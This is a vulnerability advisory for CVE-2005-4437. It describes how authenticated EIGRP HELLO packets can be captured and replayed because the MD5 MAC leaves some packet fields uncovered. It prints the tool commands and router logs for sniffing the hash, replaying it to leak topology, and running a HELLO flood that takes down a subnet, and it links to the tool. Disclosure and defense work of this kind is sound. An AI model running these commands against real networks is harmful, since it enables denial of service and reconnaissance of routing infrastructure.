Authenticated EIGRP DoS / Information leak

2005-12-19 / 2005-12-20
Credit: Andrew A. Vladimirov
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2005-4437
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Arhont Ltd.- Information Security Arhont Advisory by: Arhont Ltd Advisory: Authenticated EIGRP DoS / Information leak Class: design bug Version: EIGRP version 1.2 Model Specific: Other versions might have the same bug DETAILS: From experiments with capturing and replaying back at the router a variety of authenticated EIGRP packets, it appears that the MD5 algorithm is ran against the following packet fields: Opcode, AS number, Flags, Sequence Number, Nexthop. Thus, the presence of Message Authentication Code (MAC) does not stop attackers from replaying HELLO packets back at the router. The only condition is needed is to sniff the hash and throw it back at the EIGRP routers. An example of this would be 1. Sniff arhontus# ./eigrp.pl --sniff --iface eth0 <skip> <<<Authentication data: 0002>>> Size: 40 Key ID: 2 MD5 key digest: efe07403446c77a9697fe5753f79e52 Key in one string (Copy & paste to replay) 00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52 2. Replay arhontus#./eigrp.pl --hello --auth 00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52 The packets are received well and trigger back an EIGRP update to sniff it and find more about the network topology: 061751: 04:13:46: EIGRP: received packet with MD5 authentication, key id = 2 061752: 04:13:46: EIGRP: Received HELLO on Ethernet0/0 nbr 192.168.66.112 061753: 04:13:46: AS 1, Flags 0x0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/1 061754: 04:13:46: EIGRP: Sending UPDATE on Ethernet0/0 nbr 192.168.66.112, retry 2, RTO 4500 061755: 04:13:46: AS 1, Flags 0x9, Seq 2162/0 idbQ 1/0 iidbQ un/rely 0/0 peerQ un/rely 0/1 serno 3-8 As a result of it, additional information about the EIGRP domain can be collected from the triggered UPDATE packets. Besides, using this method the FX EIGRP/ARP DoS attack (BID 6443) can be ported to the authenticated EIGRP routing domain. This is done by combining --hellodos and --auth <captured hash> flags when running the attack using our EIGRP packet generator. The attack appears to be more efficient, than the original attack described by FX, since the routers recover much slower. This is possibly due to the additional overhead of processing the authentication information. An example of the attack command killing the network would be arhontus#./eigrp.pl --hellodos 192.168.66.0 --auth 00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52 --source 192.168.66.112 Tool: http://www.hackingciscoexposed.com/tools/eigrp-tools.tar.gz Risk Factor: Medium for DoS, Low for the Information Leak Workarounds: Extend the Message Authentication Code onto the currently unauthenticated EIGRP packet fields. Communication History: sent to PSIRT on 10/10/05 *According to the Arhont Ltd. policy, all of the found vulnerabilities and security issues will be reported to the manufacturer at least 7 days before releasing them to the public domains (such as CERT and BUGTRAQ). If you would like to get more information about this issue, please do not hesitate to contact Arhont team.*


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top